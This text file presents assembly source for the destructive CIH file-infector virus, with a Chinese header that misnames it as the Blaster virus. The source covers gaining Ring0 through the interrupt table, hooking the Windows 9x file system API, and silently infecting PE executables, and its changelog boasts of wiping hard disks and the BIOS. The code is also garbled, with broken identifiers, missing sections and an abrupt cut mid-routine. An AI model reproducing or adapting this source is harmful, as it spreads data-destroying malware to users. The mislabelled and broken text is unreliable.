cihxxxxx.txt

这是冲击波病毒的源码及其详解,可以通过它了解病毒的基本原理.

**************************************************************************** 
; * The Virus Program Information * 
; **************************************************************************** 
; * * 
; * Designer : CIH Original Place : TTIT of Taiwan * 0:4:45
; * Create Date : 04/26/1998 Now Version : 1.2 * 
; * Modification Time : 05/21/1998 * 
; * * 
; *==========================================================================* 
; * Modification History * 
; *==========================================================================* 
; * v1.0 1. Create the Virus Program. * 
; * 2. The Virus Modifies IDT to Get Ring0 Privilege. * 
; * 04/26/1998 3. Virus Code doesn't Reload into System. * 
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. * 
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. * 
; * 6. When System Opens Existing PE File, the File will be * 
; * Infected, and the File doesn't be Reinfected. * 
; * 7. It is also Infected, even the File is Read-Only. * 
; * 8. When the File is Infected, the Modification Date and Time * 
; * of the File also don't be Changed. * 
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call * 
; * Previous FileSystemApiHook, it will Call the Function * 
; * that the IFS Manager Would Normally Call to Implement * 
; * this Particular I/O Request. * 
; * 10. The Virus Size is only 656 Bytes. * 
; *==========================================================================* 
; * v1.1 1. Especially, the File that be Infected will not Increase * 
; * it's Size... ^__^ * 
; * 05/15/1998 2. Hook and Modify Structured Exception Handing. * 
; * When Exception Error Occurs, Our OS System should be in * 
; * Windows NT. So My Cute Virus will not Continue to Run, * 
; * it will Jmup to Original Application to Run. * 
; * 3. Use Better Algorithm, Reduce Virus Code Size. * 
; * 4. The Virus "Basic" Size is only 796 Bytes. * 
; *==========================================================================* 
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... * 
; * 2. Modify the Bug of v1.1 * 
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. * 
; **************************************************************************** 

.586P 

; **************************************************************************** 
; * Original PE Executable File(Don't Modify this Section) * 
; **************************************************************************** 

OriginalAppEXE SEGMENT 

FileHeader: 
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h 
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h 
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h 
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh 
db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h 
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h 
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh 
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh 
db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h 
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah 
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h 
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h 
db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h 
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h 
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h 
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h 
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h 
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h 
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h 
db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h 
db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h 
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h 
; ********************************************************* 
HookExceptionNumber = 03h 

ENDIF 


FileNameBufferSize = 7fh 

; ********************************************************* 
; ********************************************************* 

VirusGame SEGMENT 

ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame 
ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame 

; ********************************************************* 
; * Ring3 Virus Game Initial Program * 
; ********************************************************* 

MyVirusStart: 
push ebp 

; * IDT(Interrupt Descriptor Table) * 
; * to Get Ring0 Privilege... * 
; ************************************* 

push eax ; 
sidt [esp-02h] ; Get IDT Base Address 
pop ebx ; 

add ebx, HookExceptionNumber*08h+04h ; ZF = 0 

cli 

mov ebp, [ebx] ; Get Exception Base 
mov bp, [ebx-04h] ; Entry Point 

lea esi, MyExceptionHook-@1[ecx] 

push esi 

mov [ebx-04h], si ; 
shr esi, 16 ; Modify Exception 
mov [ebx+02h], si ; Entry Point Address 

pop esi 

; ************************************* 
; * Generate Exception to Get Ring0 * 
; ************************************* 

int HookExceptionNumber ; GenerateException 
ReturnAddressOfEndException = $ 

; ************************************* 
; * Merge All Virus Code Section * 
; ************************************* 

push esi 
mov esi, eax 

LoopOfMergeAllVirusCodeSection: 

mov ecx, [eax-04h] 

rep movsb 

sub eax, 08h 

mov esi, [eax] 

or esi, esi 
jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 

jmp LoopOfMergeAllVirusCodeSection 

QuitLoopOfMergeAllVirusCodeSection: 

pop esi 

; ************************************* 
; * Generate Exception Again * 
; ************************************* 

int HookExceptionNumber ; GenerateException Aga 


; ************************************* 
; * Let's Restore * 
; * Structured Exception Handing * 
; ************************************* 

ReadyRestoreSE: 
sti 

xor ebx, ebx 

jmp RestoreSE 

; ************************************* 
; * When Exception Error Occurs, * 
; * Our OS System should be in NT. * 
; * So My Cute Virus will not * 
; * Continue to Run, it Jmups to * 
; * Original Application to Run. * 
; ************************************* 

StopToRunVirusCode: 
@1 = StopToRunVirusCode 

xor ebx, ebx 
mov eax, fs:[ebx] 
mov esp, [eax] 

RestoreSE: 
pop dword ptr fs:[ebx] 
pop eax 

; ************************************* 
; * Return Original App to Execute * 
; ************************************* 

pop ebp 

push 00401000h ; Push Original 
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack 

ret ; Return to Original App Entry Point 

; ********************************************************* 
; * Ring0 Virus Game Initial Program * 
; ********************************************************* 

MyExceptionHook: 
@2 = MyExceptionHook 

jz InstallMyFileSystemApiHook 

; ************************************* 
; * Do My Virus Exist in System !? * 
; ************************************* 

mov ecx, dr0 
jecxz AllocateSystemMemoryPage 

add dword ptr [esp], ReadyRestoreSE-ReturnAddressOf 
dException 

; ************************************* 
; * Return to Ring3 Initial Program * 
; ************************************* 

ExitRing0Init: 
mov [ebx-04h], bp ; 
shr ebp, 16 ; Restore Exception 
mov [ebx+02h], bp ; 

iretd 

; ************************************* 
; * Allocate SystemMemory Page to Use * 
; ************************************* 

AllocateSystemMemoryPage: 

mov dr0, ebx ; Set the Mark of My Virus Exis 
in System 

push 00000000fh ; 
push ecx ; 
push 0ffffffffh ; 
push ecx ; 
push ecx ; 
push ecx ; 
push 000000001h ; 
push 000000002h ; 
int 20h ; VMMCALL _PageAllocate 
_PageAllocate = $ ; 
dd 00010053h ; Use EAX, ECX, EDX, and flags 
add esp, 08h*04h 

xchg edi, eax ; EDI = SystemMemory Start Addr 
s 

lea eax, MyVirusStart-@2[esi] 

iretd ; Return to Ring3 Initial Program 

; ************************************* 
; * Install My File System Api Hook * 
; ************************************* 

InstallMyFileSystemApiHook: 

lea eax, FileSystemApiHook-@6[edi] 

push eax ; 
int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook 
IFSMgr_InstallFileSystemApiHook = $ ; 
dd 00400067h ; Use EAX, ECX, EDX, and flags 

mov dr0, eax ; Save OldFileSystemApiHook Add 
ss 

pop eax ; EAX = FileSystemApiHook Address 

; Save Old IFSMgr_InstallFileSystemApiHook Entry Point 
mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi] 
mov edx, [ecx] 
mov OldInstallFileSystemApiHook-@3[eax], edx 

; Modify IFSMgr_InstallFileSystemApiHook Entry Point 
lea eax, InstallFileSystemApiHook-@3[eax] 
mov [ecx], eax 

cli 

jmp ExitRing0Init 

; ********************************************************* 
; * Code Size of Merge Virus Code Section * 
; ********************************************************* 

CodeSizeOfMergeVirusCodeSection = offset $ 

; ********************************************************* 
; * IFSMgr_InstallFileSystemApiHook * 
; ********************************************************* 

InstallFileSystemApiHook: 
push ebx 

call @4 ; 
@4: ; 
pop ebx ; mov ebx, offset FileSystemApiHook 
add ebx, FileSystemApiHook-@4 ; 

push ebx 
int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook 
IFSMgr_RemoveFileSystemApiHook = $ 
dd 00400068h ; Use EAX, ECX, EDX, and flags 
pop eax 

; Call Original IFSMgr_InstallFileSystemApiHook 
; to Link Client FileSystemApiHook 
push dword ptr [esp+8] 
call OldInstallFileSystemApiHook-@3[ebx] 
pop ecx 

push eax 

; Call Original IFSMgr_InstallFileSystemApiHook 
; to Link My FileSystemApiHook 
push ebx 
call OldInstallFileSystemApiHook-@3[ebx] 
pop ecx 

mov dr0, eax ; Adjust OldFileSystemApiHook A 
ress 

pop eax 

pop ebx 

ret 

; ********************************************************* 
; * Static Data * 
; ********************************************************* 

OldInstallFileSystemApiHook dd ? 

; ********************************************************* 
; * IFSMgr_FileSystemHook * 
; ********************************************************* 

; ************************************* 
; * IFSMgr_FileSystemHook Entry Point * 
; ************************************* 

FileSystemApiHook: 
@3 = FileSystemApiHook 

pushad 

call @5 ; 
je CallUniToBCSPath 

add al, 40h 
mov ah, ':' 

mov [esi], eax 

inc esi 
inc esi 

; ************************************* 
; * UniToBCSPath * 
; ************************************* 
; * This Service Converts * 
; * a Canonicalized Unicode Pathname * 
; * to a Normal Pathname in the * 
; * Specified BCS Character Set. * 
; ************************************* 

CallUniToBCSPath: 
push 00000000h 
push FileNameBufferSize 
mov ebx, [ebx+10h] 
mov eax, [ebx+0ch] 
add eax, 04h 
push eax 
push esi 
int 20h ; VXDCall UniToBCSPath 
UniToBCSPath = $ 
dd 00400041h 
add esp, 04h*04h 

; ************************************* 
; * Is FileName '.EXE' !? * 
; ************************************* 

; cmp [esi+eax-04h], '.EXE' 
cmp [esi+eax-04h], 'EXE.' 
pop esi 
jne DisableOnBusy 

IF DEBUG 

; ************************************* 
; * Only for Debug * 
; ************************************* 

; cmp [esi+eax-06h], 'FUCK' 
cmp [esi+eax-06h], 'KCUF' 
jne DisableOnBusy 

ENDIF 

; ************************************* 
; * Is Open Existing File !? * 
; ************************************* 

; if ( NotOpenExistingFile ) 
; goto DisableOnBusy 
cmp word ptr [ebx+18h], 01h 
jne DisableOnBusy 

; ************************************* 
; * Get Attributes of the File * 
; ************************************* 

mov ax, 4300h 
int 20h ; VXDCall IFSMgr_Ring0_FileIO 
IFSMgr_Ring0_FileIO = $ 
dd 00400032h 

jc DisableOnBusy 

push ecx 

; ************************************* 
; * Get IFSMgr_Ring0_FileIO Address * 
; ************************************* 

mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi] 
mov edi, [edi] 

; ************************************* 
; * Is Read-Only File !? * 
; ************************************* 

test cl, 01h 
jz OpenFile 

; ************************************* 
; * Modify Read-Only File to Write * 
; ************************************* 

mov ax, 4301h 
xor ecx, ecx 
call edi ; VXDCall IFSMgr_Ring0_FileIO 

; ************************************* 
; * Open File * 
; ************************************* 

Openfile: 
xor eax, eax 
mov ah, 0d5h 
xor ecx, ecx 
xor edx, edx 
inc edx 
mov ebx, edx 
inc ebx 
call edi ; VXDCall IFSMgr_Ring0_FileIO 

xchg ebx, eax ; mov ebx, FileHandle 

; ************************************* 
; * Need to Restore * 
; * Attributes of the File !? * 
; ************************************* 

pop ecx 

pushf 

test cl, 01h 
jz IsOpenFileOK 

; ************************************* 
; * Restore Attributes of the File * 
; ************************************* 

mov ax, 4301h 
call edi ; VXDCall IFSMgr_Ring0_FileIO 

; ************************************* 
; * Is Open File OK !? * 
; ************************************* 

IsOpenFileOK: 
popf 

jc DisableOnBusy 

; ************************************* 
; * Open File Already Succeed. ^__^ * 
; ************************************* 

push esi ; Push FileNameBuffer Address to Stack 

pushf ; Now CF = 0, Push Flag to Stack 

add esi, DataBuffer-@7 ; mov esi, offset DataBuffer 

; *************************** 
; * Get OffsetToNewHeader * 
; *************************** 

xor eax, eax 
mov ah, 0d6h 

; For Doing Minimal VirusCode's Length, 
; I Save EAX to EBP. 
mov ebp, eax 

xor ecx, ecx 
mov cl, 04h 
xor edx, edx 
mov dl, 3ch 
call edi ; VXDCall IFSMgr_Ring0_FileIO 

mov edx, [esi] 

; *************************** 
; * Get 'PE\0' Signature * 
; * of ImageFileHeader, and * 
; * Infected Mark. * 
; *************************** 

dec edx 

mov eax, ebp 
call edi ; VXDCall IFSMgr_Ring0_FileIO 

; *************************** 
; * Is PE !? * 
; *************************** 
; * Is the File * 
; * Already Infected !? * 
; *************************** 

; cmp [esi], '\0PE\0' 
cmp dword ptr [esi], 00455000h 
jne CloseFile 

; ************************************* 
; * The File is ^o^ * 
; * PE(Portable Executable) indeed. * 
; ************************************* 
; * The File isn't also Infected. * 
; ************************************* 

; ************************************* 
; * Start to Infect the File * 
; ************************************* 
; * Registers Use Status Now : * 
; * * 
; * EAX = 04h * 
; * EBX = File Handle * 
; * ECX = 04h * 
; * EDX = 'PE\0\0' Signature of * 
; * ImageFileHeader Pointer's * 
; * Former Byte. * 
; * ESI = DataBuffer Address ==> @8 * 
; * EDI = IFSMgr_Ring0_FileIO Address * 
; * EBP = D600h ==> Read Data in File *